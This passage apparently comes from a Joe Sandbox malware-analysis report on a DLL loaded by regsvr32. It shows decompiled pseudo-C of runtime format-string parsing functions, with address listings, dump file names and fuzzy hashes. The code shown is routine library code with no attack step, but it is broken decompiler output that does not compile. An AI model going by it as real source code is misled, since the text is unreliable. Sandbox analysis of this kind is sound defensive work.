                                                                                                    0x18001a7d4

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: $*
                                                                                                    • API String ID: 3215553584-3982473090
                                                                                                    • Opcode ID: ea119f30d4038aceae1809a9de72227ab2221f42d43358f04b6b4b06a01053d5
                                                                                                    • Instruction ID: d654669fde36460b4c06c68384abd70682ae06f373531a2d91abbaf262f35bba
                                                                                                    • Opcode Fuzzy Hash: ea119f30d4038aceae1809a9de72227ab2221f42d43358f04b6b4b06a01053d5
                                                                                                    • Instruction Fuzzy Hash: 8F81417210CA488AFBE78F7994443E83BB1E35BBC8F188116EA46462D6DF35C749CB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001ABFC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 62%
                                                                                                    			E0000000118001ABFC(signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				void* _t64;
				intOrPtr _t67;
				char _t68;
				intOrPtr _t73;
				signed int _t85;
				intOrPtr _t88;
				void* _t91;
				char _t101;
				signed int _t104;
				intOrPtr _t116;
				intOrPtr* _t137;
				char _t138;
				intOrPtr* _t139;
				void* _t141;
				signed int* _t155;
				signed int* _t162;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t141 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x468)) != __rbp) goto 0x8001ac3a;
				_t64 = E0000000118002E69C(__rax);
				 *__rax = 0x16;
				E0000000118002E4F0(_t64);
				goto 0x8001ae72;
				if ( *((intOrPtr*)(__rcx + 0x18)) == __rbp) goto 0x8001ac22;
				_t104 = __edi | 0xffffffff;
				 *((intOrPtr*)(__rcx + 0x478)) =  *((intOrPtr*)(__rcx + 0x478)) + 1;
				_t67 =  *((intOrPtr*)(__rcx + 0x478));
				if (_t67 == 3) goto 0x8001ae6f;
				if (_t67 != 2) goto 0x8001ac71;
				if ( *((intOrPtr*)(__rcx + 0x47c)) == 1) goto 0x8001ae6f;
				_t137 =  *((intOrPtr*)(__rcx + 0x480));
				_t162 = __rcx + 0x34;
				_t155 = __rcx + 0x38;
				 *((intOrPtr*)(__rcx + 0x47c)) = 0;
				 *(__rcx + 0xde8) = _t104;
				 *(__rcx + 0xdec) = _t104;
				 *_t162 = 0;
				 *_t155 = 0;
				 *((long long*)(__rcx + 0x18)) = _t137;
				 *((intOrPtr*)(__rcx + 0x50)) = 0;
				 *(__rcx + 0x2c) = 0;
				_t68 =  *_t137;
				 *((char*)(__rcx + 0x41)) = _t68;
				if (_t68 == 0) goto 0x8001ae46;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x8001ae4a;
				if ( *((intOrPtr*)(__rcx + 0x41)) - 0x20 - 0x5a > 0) goto 0x8001acd7;
				_t138 =  *((char*)(__rcx + 0x41));
				goto 0x8001acd9;
				_t100 = ( *(__rcx + 0x8004ba40) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = ( *(__rcx + 0x8004ba40) & 0x000000ff) >> 4;
				if (E000000011800272F8(__rcx) == 0) goto 0x8001ae6b;
				_t73 =  *((intOrPtr*)(_t141 + 0x2c));
				if (_t73 == 8) goto 0x8001ae5b;
				_t116 = _t73;
				if (_t116 == 0) goto 0x8001ae29;
				if (_t116 == 0) goto 0x8001ae14;
				if (_t116 == 0) goto 0x8001addf;
				if (_t116 == 0) goto 0x8001ad9e;
				if (_t116 == 0) goto 0x8001ad97;
				if (_t116 == 0) goto 0x8001ad56;
				if (_t116 == 0) goto 0x8001ad49;
				if (_t73 - 0xfffffffffffffffc != 1) goto 0x8001ae6b;
				E0000000118001F2AC(_t138, _t141, _t141, _t155, __rbp);
				goto 0x8001ae31;
				E0000000118001DBD8(_t138, _t141);
				goto 0x8001ae31;
				if ( *((char*)(_t141 + 0x41)) == 0x2a) goto 0x8001ad6c;
				E00000001180019F10(_t141, _t141, _t155);
				goto 0x8001ae31;
				if (E00000001180026CB0(_t100, _t138, _t141, _t141) == 0) goto 0x8001ae6b;
				if ( *((intOrPtr*)(_t141 + 0x478)) != 1) goto 0x8001ad8f;
				if ( *((intOrPtr*)(_t141 + 0x47c)) != 1) goto 0x8001ae35;
				if ( *_t155 >= 0) goto 0x8001addb;
				 *_t155 = _t104;
				goto 0x8001addb;
				 *_t155 = 0;
				goto 0x8001ae35;
				if ( *((char*)(_t141 + 0x41)) == 0x2a) goto 0x8001adac;
				goto 0x8001ad62;
				if (E00000001180026808(_t100, _t138, _t141, _t141) == 0) goto 0x8001ae6b;
				if ( *((intOrPtr*)(_t141 + 0x478)) != 1) goto 0x8001adcb;
				if ( *((intOrPtr*)(_t141 + 0x47c)) != 1) goto 0x8001ae35;
				_t85 =  *_t162;
				if (_t85 >= 0) goto 0x8001addb;
				 *(_t141 + 0x30) =  *(_t141 + 0x30) | 0x00000004;
				 *_t162 =  ~_t85;
				goto 0x8001ae31;
				_t88 =  *((intOrPtr*)(_t141 + 0x41));
				if (_t88 == 0x20) goto 0x8001ae0e;
				if (_t88 == 0x23) goto 0x8001ae08;
				if (_t88 == 0x2b) goto 0x8001ae02;
				if (_t88 == 0x2d) goto 0x8001adfc;
				if (_t88 != 0x30) goto 0x8001ae35;
				 *(_t141 + 0x30) =  *(_t141 + 0x30) | 0x00000008;
				goto 0x8001ae35;
				 *(_t141 + 0x30) =  *(_t141 + 0x30) | 0x00000004;
				goto 0x8001ae35;
				 *(_t141 + 0x30) =  *(_t141 + 0x30) | 0x00000001;
				goto 0x8001ae35;
				 *(_t141 + 0x30) =  *(_t141 + 0x30) | 0x00000020;
				goto 0x8001ae35;
				 *(_t141 + 0x30) =  *(_t141 + 0x30) | 0x00000002;
				goto 0x8001ae35;
				 *_t162 = 0;
				 *((intOrPtr*)(_t141 + 0x40)) = bpl;
				 *(_t141 + 0x30) = 0;
				 *_t155 = _t104;
				 *((intOrPtr*)(_t141 + 0x3c)) = 0;
				 *((intOrPtr*)(_t141 + 0x54)) = bpl;
				goto 0x8001ae35;
				if (E0000000118001C6D0(_t141) == 0) goto 0x8001ae6b;
				_t139 =  *((intOrPtr*)(_t141 + 0x18));
				_t101 =  *_t139;
				 *((char*)(_t141 + 0x41)) = _t101;
				if (_t101 != 0) goto 0x8001acae;
				 *((long long*)(_t141 + 0x18)) =  *((long long*)(_t141 + 0x18)) + 1;
				if (E00000001180027768(_t139, _t141) == 0) goto 0x8001ae6b;
				goto 0x8001ac4a;
				_t91 = E0000000118002E69C(_t139);
				 *_t139 = 0x16;
				E0000000118002E4F0(_t91);
				goto 0x8001ae72;
				return  *((intOrPtr*)(_t141 + 0x28));
			}



















                                                                                                    0x18001abfc
                                                                                                    0x18001ac01
                                                                                                    0x18001ac06
                                                                                                    0x18001ac16
                                                                                                    0x18001ac20
                                                                                                    0x18001ac22
                                                                                                    0x18001ac27
                                                                                                    0x18001ac2d
                                                                                                    0x18001ac35
                                                                                                    0x18001ac3e
                                                                                                    0x18001ac40
                                                                                                    0x18001ac4a
                                                                                                    0x18001ac50
                                                                                                    0x18001ac59
                                                                                                    0x18001ac62
                                                                                                    0x18001ac6b
                                                                                                    0x18001ac71
                                                                                                    0x18001ac78
                                                                                                    0x18001ac7c
                                                                                                    0x18001ac80
                                                                                                    0x18001ac86
                                                                                                    0x18001ac8c
                                                                                                    0x18001ac92
                                                                                                    0x18001ac95
                                                                                                    0x18001ac97
                                                                                                    0x18001ac9b
                                                                                                    0x18001ac9e
                                                                                                    0x18001aca1
                                                                                                    0x18001aca3
                                                                                                    0x18001aca8
                                                                                                    0x18001acae
                                                                                                    0x18001acb5
                                                                                                    0x18001acc5
                                                                                                    0x18001acc7
                                                                                                    0x18001acd5
                                                                                                    0x18001ace3
                                                                                                    0x18001ace6
                                                                                                    0x18001acf3
                                                                                                    0x18001acf9
                                                                                                    0x18001acff
                                                                                                    0x18001ad05
                                                                                                    0x18001ad07
                                                                                                    0x18001ad10
                                                                                                    0x18001ad19
                                                                                                    0x18001ad22
                                                                                                    0x18001ad27
                                                                                                    0x18001ad2c
                                                                                                    0x18001ad31
                                                                                                    0x18001ad36
                                                                                                    0x18001ad3f
                                                                                                    0x18001ad44
                                                                                                    0x18001ad4c
                                                                                                    0x18001ad51
                                                                                                    0x18001ad5d
                                                                                                    0x18001ad62
                                                                                                    0x18001ad67
                                                                                                    0x18001ad73
                                                                                                    0x18001ad80
                                                                                                    0x18001ad89
                                                                                                    0x18001ad91
                                                                                                    0x18001ad93
                                                                                                    0x18001ad95
                                                                                                    0x18001ad97
                                                                                                    0x18001ad99
                                                                                                    0x18001ada5
                                                                                                    0x18001adaa
                                                                                                    0x18001adb3
                                                                                                    0x18001adc0
                                                                                                    0x18001adc9
                                                                                                    0x18001adcb
                                                                                                    0x18001add0
                                                                                                    0x18001add2
                                                                                                    0x18001add8
                                                                                                    0x18001addd
                                                                                                    0x18001addf
                                                                                                    0x18001ade4
                                                                                                    0x18001ade8
                                                                                                    0x18001adec
                                                                                                    0x18001adf0
                                                                                                    0x18001adf4
                                                                                                    0x18001adf6
                                                                                                    0x18001adfa
                                                                                                    0x18001adfc
                                                                                                    0x18001ae00
                                                                                                    0x18001ae02
                                                                                                    0x18001ae06
                                                                                                    0x18001ae08
                                                                                                    0x18001ae0c
                                                                                                    0x18001ae0e
                                                                                                    0x18001ae12
                                                                                                    0x18001ae14
                                                                                                    0x18001ae17
                                                                                                    0x18001ae1b
                                                                                                    0x18001ae1e
                                                                                                    0x18001ae20
                                                                                                    0x18001ae23
                                                                                                    0x18001ae27
                                                                                                    0x18001ae33
                                                                                                    0x18001ae35
                                                                                                    0x18001ae39
                                                                                                    0x18001ae3b
                                                                                                    0x18001ae40
                                                                                                    0x18001ae46
                                                                                                    0x18001ae54
                                                                                                    0x18001ae56
                                                                                                    0x18001ae5b
                                                                                                    0x18001ae60
                                                                                                    0x18001ae66
                                                                                                    0x18001ae6d
                                                                                                    0x18001ae8a

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: $*
                                                                                                    • API String ID: 3215553584-3982473090
                                                                                                    • Opcode ID: a71210adc4af6c34db67317eec88c9ad337298ae2cf0cc494a295d909e6156ed
                                                                                                    • Instruction ID: ea4bb9611e62857e6a0b7106eb37813fe267d052d99aea3ffaa75824ed6a6b79
                                                                                                    • Opcode Fuzzy Hash: a71210adc4af6c34db67317eec88c9ad337298ae2cf0cc494a295d909e6156ed
                                                                                                    • Instruction Fuzzy Hash: 5A81607214CE488AFBE69F3590443E83BE1E71FB88F188129EA8647299CF35C649C715
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00000001800352A4 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 184COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E000000011800352A4(void* __ebx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t11;
				void* _t13;
				intOrPtr* _t21;
				intOrPtr* _t35;

				_t21 = _t35;
				 *((long long*)(_t21 + 8)) = __rbx;
				 *((long long*)(_t21 + 0x10)) = __rbp;
				 *((long long*)(_t21 + 0x18)) = __rsi;
				 *((long long*)(_t21 + 0x20)) = __rdi;
				r15b = r9b;
				_t10 =  >  ? __ebx : 0;
				_t11 = ( >  ? __ebx : 0) + 9;
				if (__rdx - _t21 > 0) goto 0x80035309;
				_t13 = E0000000118002E69C(_t21);
				 *_t21 = 0x22;
				E0000000118002E4F0(_t13);
				return 0x22;
			}







                                                                                                    0x1800352a4
                                                                                                    0x1800352a7
                                                                                                    0x1800352ab
                                                                                                    0x1800352af
                                                                                                    0x1800352b3
                                                                                                    0x1800352c5
                                                                                                    0x1800352ce
                                                                                                    0x1800352d1
                                                                                                    0x1800352d9
                                                                                                    0x1800352db
                                                                                                    0x1800352e5
                                                                                                    0x1800352e7
                                                                                                    0x180035308

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: -$e+000$gfff
                                                                                                    • API String ID: 3215553584-2620144452
                                                                                                    • Opcode ID: 278c35da2fefb8d56d4f52ff0b8ff5e8f0a42c7dc2e25ce8db5e296bac3575b3
                                                                                                    • Instruction ID: 19eafbc191ad2bb806f1b2ba21099073ae5416e31ca6719882427acbab70aa04
                                                                                                    • Opcode Fuzzy Hash: 278c35da2fefb8d56d4f52ff0b8ff5e8f0a42c7dc2e25ce8db5e296bac3575b3
                                                                                                    • Instruction Fuzzy Hash: EF7106727147C886E7A68B35A94039EBB91E749BD0F09C225EB9847BD5DF7CC648C700
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001A318 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 156COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 71%
                                                                                                    			E0000000118001A318(signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a8, long long _a16) {
				void* _t75;
				intOrPtr _t87;
				void* _t90;
				unsigned int _t96;
				signed int _t103;
				signed int _t105;
				char _t107;
				void* _t108;
				signed int _t111;
				unsigned int _t119;
				void* _t141;
				intOrPtr _t144;
				void* _t149;
				void* _t152;

				_t149 = __rdx;
				_a8 = __rbx;
				_a16 = __rbp;
				_t141 = __rcx;
				_t144 =  *((intOrPtr*)(__rcx + 0x468));
				if (_t144 != 0) goto 0x8001a348;
				_t75 = E0000000118002E69C(__rax);
				 *__rax = 0x16;
				E0000000118002E4F0(_t75);
				goto 0x8001a351;
				if (E00000001180027BA4(_t90, _t108, _t144) != 0) goto 0x8001a359;
				goto 0x8001a513;
				if ( *((long long*)(__rcx + 0x18)) == 0) goto 0x8001a336;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x8001a510;
				_t111 = __edi | 0xffffffff;
				 *(__rcx + 0x50) =  *(__rcx + 0x50) & 0x00000000;
				 *(__rcx + 0x2c) =  *(__rcx + 0x2c) & 0x00000000;
				goto 0x8001a4dc;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x8001a4f1;
				if ( *((intOrPtr*)(__rcx + 0x41)) - 0x20 - 0x5a > 0) goto 0x8001a3b3;
				_t136 =  *((char*)(__rcx + 0x41));
				goto 0x8001a3b5;
				_t96 = ( *(_t144 + 0x8004ba40) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t96;
				if (_t96 == 8) goto 0x8001a523;
				_t119 = _t96;
				if (_t119 == 0) goto 0x8001a4d0;
				if (_t119 == 0) goto 0x8001a4b7;
				if (_t119 == 0) goto 0x8001a482;
				if (_t119 == 0) goto 0x8001a456;
				if (_t119 == 0) goto 0x8001a44d;
				if (_t119 == 0) goto 0x8001a420;
				if (_t119 == 0) goto 0x8001a413;
				if (_t96 - 0xfffffffffffffffc != 1) goto 0x8001a533;
				E0000000118001E8A8( *((char*)(__rcx + 0x41)), __rcx, __rcx, _t149, _t152, 0x8004ba40);
				goto 0x8001a4d8;
				E0000000118001D5E8(_t136, _t141);
				goto 0x8001a4d8;
				if ( *((char*)(_t141 + 0x41)) == 0x2a) goto 0x8001a437;
				E00000001180019D00(_t141, _t141, _t141 + 0x38);
				goto 0x8001a4d8;
				 *((long long*)(_t141 + 0x20)) =  *((long long*)(_t141 + 0x20)) + 8;
				_t103 =  *( *((intOrPtr*)(_t141 + 0x20)) - 8);
				_t104 =  <  ? _t111 : _t103;
				 *(_t141 + 0x38) =  <  ? _t111 : _t103;
				goto 0x8001a47e;
				 *(_t141 + 0x38) =  *(_t141 + 0x38) & 0x00000000;
				goto 0x8001a4dc;
				if ( *((char*)(_t141 + 0x41)) == 0x2a) goto 0x8001a462;
				goto 0x8001a42a;
				 *((long long*)(_t141 + 0x20)) =  *((long long*)(_t141 + 0x20)) + 8;
				_t105 =  *( *((intOrPtr*)(_t141 + 0x20)) - 8);
				 *(_t141 + 0x34) = _t105;
				if (_t105 >= 0) goto 0x8001a47e;
				 *(_t141 + 0x30) =  *(_t141 + 0x30) | 0x00000004;
				 *(_t141 + 0x34) =  ~_t105;
				goto 0x8001a4d8;
				_t87 =  *((intOrPtr*)(_t141 + 0x41));
				if (_t87 == 0x20) goto 0x8001a4b1;
				if (_t87 == 0x23) goto 0x8001a4ab;
				if (_t87 == 0x2b) goto 0x8001a4a5;
				if (_t87 == 0x2d) goto 0x8001a49f;
				if (_t87 != 0x30) goto 0x8001a4dc;
				 *(_t141 + 0x30) =  *(_t141 + 0x30) | 0x00000008;
				goto 0x8001a4dc;
				 *(_t141 + 0x30) =  *(_t141 + 0x30) | 0x00000004;
				goto 0x8001a4dc;
				 *(_t141 + 0x30) =  *(_t141 + 0x30) | 0x00000001;
				goto 0x8001a4dc;
				 *(_t141 + 0x30) =  *(_t141 + 0x30) | 0x00000020;
				goto 0x8001a4dc;
				 *(_t141 + 0x30) =  *(_t141 + 0x30) | 0x00000002;
				goto 0x8001a4dc;
				 *(_t141 + 0x34) =  *(_t141 + 0x34) & 0x00000000;
				 *(_t141 + 0x30) =  *(_t141 + 0x30) & 0x00000000;
				 *(_t141 + 0x3c) =  *(_t141 + 0x3c) & 0x00000000;
				 *((char*)(_t141 + 0x40)) = 0;
				 *(_t141 + 0x38) = _t111;
				 *((char*)(_t141 + 0x54)) = 0;
				goto 0x8001a4dc;
				if (E0000000118001C4E4(_t141) == 0) goto 0x8001a533;
				_t107 =  *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x18))));
				 *((char*)(_t141 + 0x41)) = _t107;
				if (_t107 != 0) goto 0x8001a38a;
				 *((long long*)(_t141 + 0x18)) =  *((long long*)(_t141 + 0x18)) + 1;
				if ( *((intOrPtr*)(_t141 + 0x2c)) == 0) goto 0x8001a4fd;
				if ( *((intOrPtr*)(_t141 + 0x2c)) != 7) goto 0x8001a523;
				 *((intOrPtr*)(_t141 + 0x470)) =  *((intOrPtr*)(_t141 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t141 + 0x470)) != 2) goto 0x8001a37d;
				return  *((intOrPtr*)(_t141 + 0x28));
			}

















                                                                                                    0x18001a318
                                                                                                    0x18001a318
                                                                                                    0x18001a31d
                                                                                                    0x18001a327
                                                                                                    0x18001a32a
                                                                                                    0x18001a334
                                                                                                    0x18001a336
                                                                                                    0x18001a33b
                                                                                                    0x18001a341
                                                                                                    0x18001a346
                                                                                                    0x18001a34f
                                                                                                    0x18001a354
                                                                                                    0x18001a35e
                                                                                                    0x18001a360
                                                                                                    0x18001a36d
                                                                                                    0x18001a373
                                                                                                    0x18001a37d
                                                                                                    0x18001a381
                                                                                                    0x18001a385
                                                                                                    0x18001a38a
                                                                                                    0x18001a392
                                                                                                    0x18001a3a2
                                                                                                    0x18001a3a4
                                                                                                    0x18001a3b1
                                                                                                    0x18001a3c0
                                                                                                    0x18001a3c3
                                                                                                    0x18001a3c9
                                                                                                    0x18001a3cf
                                                                                                    0x18001a3d1
                                                                                                    0x18001a3da
                                                                                                    0x18001a3e3
                                                                                                    0x18001a3ec
                                                                                                    0x18001a3f1
                                                                                                    0x18001a3f6
                                                                                                    0x18001a3fb
                                                                                                    0x18001a400
                                                                                                    0x18001a409
                                                                                                    0x18001a40e
                                                                                                    0x18001a416
                                                                                                    0x18001a41b
                                                                                                    0x18001a424
                                                                                                    0x18001a42d
                                                                                                    0x18001a432
                                                                                                    0x18001a437
                                                                                                    0x18001a440
                                                                                                    0x18001a445
                                                                                                    0x18001a448
                                                                                                    0x18001a44b
                                                                                                    0x18001a44d
                                                                                                    0x18001a451
                                                                                                    0x18001a45a
                                                                                                    0x18001a460
                                                                                                    0x18001a462
                                                                                                    0x18001a46b
                                                                                                    0x18001a46e
                                                                                                    0x18001a473
                                                                                                    0x18001a475
                                                                                                    0x18001a47b
                                                                                                    0x18001a480
                                                                                                    0x18001a482
                                                                                                    0x18001a487
                                                                                                    0x18001a48b
                                                                                                    0x18001a48f
                                                                                                    0x18001a493
                                                                                                    0x18001a497
                                                                                                    0x18001a499
                                                                                                    0x18001a49d
                                                                                                    0x18001a49f
                                                                                                    0x18001a4a3
                                                                                                    0x18001a4a5
                                                                                                    0x18001a4a9
                                                                                                    0x18001a4ab
                                                                                                    0x18001a4af
                                                                                                    0x18001a4b1
                                                                                                    0x18001a4b5
                                                                                                    0x18001a4b7
                                                                                                    0x18001a4bb
                                                                                                    0x18001a4bf
                                                                                                    0x18001a4c3
                                                                                                    0x18001a4c7
                                                                                                    0x18001a4ca
                                                                                                    0x18001a4ce
                                                                                                    0x18001a4da
                                                                                                    0x18001a4e0
                                                                                                    0x18001a4e2
                                                                                                    0x18001a4e7
                                                                                                    0x18001a4ed
                                                                                                    0x18001a4f5
                                                                                                    0x18001a4fb
                                                                                                    0x18001a4fd
                                                                                                    0x18001a50a
                                                                                                    0x18001a522

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: $*
                                                                                                    • API String ID: 3215553584-3982473090
                                                                                                    • Opcode ID: 5427f3723b36e323f2e166800d657709d73a8289e5a3f0533a09799d384265dc
                                                                                                    • Instruction ID: d3ff0db67e3fbb5f7534ed509432ff267503bd3053bd70a897b88d57a6ec8185
                                                                                                    • Opcode Fuzzy Hash: 5427f3723b36e323f2e166800d657709d73a8289e5a3f0533a09799d384265dc
                                                                                                    • Instruction Fuzzy Hash: E561547210CA488BFBEB8E7880593FC37A1F39FB99F149119FA4602295CF64C689D715
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001A7D8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 71%
                                                                                                    			E0000000118001A7D8(signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a8, long long _a16) {
				void* _t73;
				unsigned int _t81;
				intOrPtr _t92;
				void* _t95;
				signed int _t99;
				signed int _t101;
				char _t103;
				void* _t104;
				signed int _t107;
				unsigned int _t115;
				void* _t135;
				void* _t143;
				void* _t146;

				_t143 = __rdx;
				_a8 = __rbx;
				_a16 = __rbp;
				_t135 = __rcx;
				if ( *((intOrPtr*)(__rcx + 0x468)) != 0) goto 0x8001a808;
				_t73 = E0000000118002E69C(__rax);
				 *__rax = 0x16;
				E0000000118002E4F0(_t73);
				goto 0x8001a811;
				if (E00000001180027BA4(_t95, _t104,  *((intOrPtr*)(__rcx + 0x468))) != 0) goto 0x8001a819;
				goto 0x8001a9c3;
				if ( *((long long*)(__rcx + 0x18)) == 0) goto 0x8001a7f6;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x8001a9c0;
				_t107 = __edi | 0xffffffff;
				 *(__rcx + 0x50) =  *(__rcx + 0x50) & 0x00000000;
				 *(__rcx + 0x2c) =  *(__rcx + 0x2c) & 0x00000000;
				goto 0x8001a998;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x8001a9ad;
				if ( *((intOrPtr*)(__rcx + 0x41)) - 0x20 - 0x5a > 0) goto 0x8001a873;
				_t130 =  *((char*)(__rcx + 0x41));
				goto 0x8001a875;
				_t81 = ( *( *((char*)(__rcx + 0x41)) + 0x8004b9e0) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t81;
				if (_t81 == 8) goto 0x8001a9d3;
				_t115 = _t81;
				if (_t115 == 0) goto 0x8001a98c;
				if (_t115 == 0) goto 0x8001a973;
				if (_t115 == 0) goto 0x8001a93e;
				if (_t115 == 0) goto 0x8001a912;
				if (_t115 == 0) goto 0x8001a909;
				if (_t115 == 0) goto 0x8001a8dc;
				if (_t115 == 0) goto 0x8001a8cf;
				if (_t81 - 0xfffffffffffffffc != 1) goto 0x8001a9e3;
				E0000000118001EDB4( *((char*)(__rcx + 0x41)), __rcx, __rcx, _t143, _t146, 0x8004b9e0);
				goto 0x8001a994;
				E0000000118001D8E0(_t130, _t135);
				goto 0x8001a994;
				if ( *((char*)(_t135 + 0x41)) == 0x2a) goto 0x8001a8f3;
				E00000001180019E08(_t135, _t135, _t135 + 0x38);
				goto 0x8001a994;
				 *((long long*)(_t135 + 0x20)) =  *((long long*)(_t135 + 0x20)) + 8;
				_t99 =  *( *((intOrPtr*)(_t135 + 0x20)) - 8);
				_t100 =  <  ? _t107 : _t99;
				 *(_t135 + 0x38) =  <  ? _t107 : _t99;
				goto 0x8001a93a;
				 *(_t135 + 0x38) =  *(_t135 + 0x38) & 0x00000000;
				goto 0x8001a998;
				if ( *((char*)(_t135 + 0x41)) == 0x2a) goto 0x8001a91e;
				goto 0x8001a8e6;
				 *((long long*)(_t135 + 0x20)) =  *((long long*)(_t135 + 0x20)) + 8;
				_t101 =  *( *((intOrPtr*)(_t135 + 0x20)) - 8);
				 *(_t135 + 0x34) = _t101;
				if (_t101 >= 0) goto 0x8001a93a;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000004;
				 *(_t135 + 0x34) =  ~_t101;
				goto 0x8001a994;
				_t92 =  *((intOrPtr*)(_t135 + 0x41));
				if (_t92 == 0x20) goto 0x8001a96d;
				if (_t92 == 0x23) goto 0x8001a967;
				if (_t92 == 0x2b) goto 0x8001a961;
				if (_t92 == 0x2d) goto 0x8001a95b;
				if (_t92 != 0x30) goto 0x8001a998;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000008;
				goto 0x8001a998;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000004;
				goto 0x8001a998;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000001;
				goto 0x8001a998;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000020;
				goto 0x8001a998;
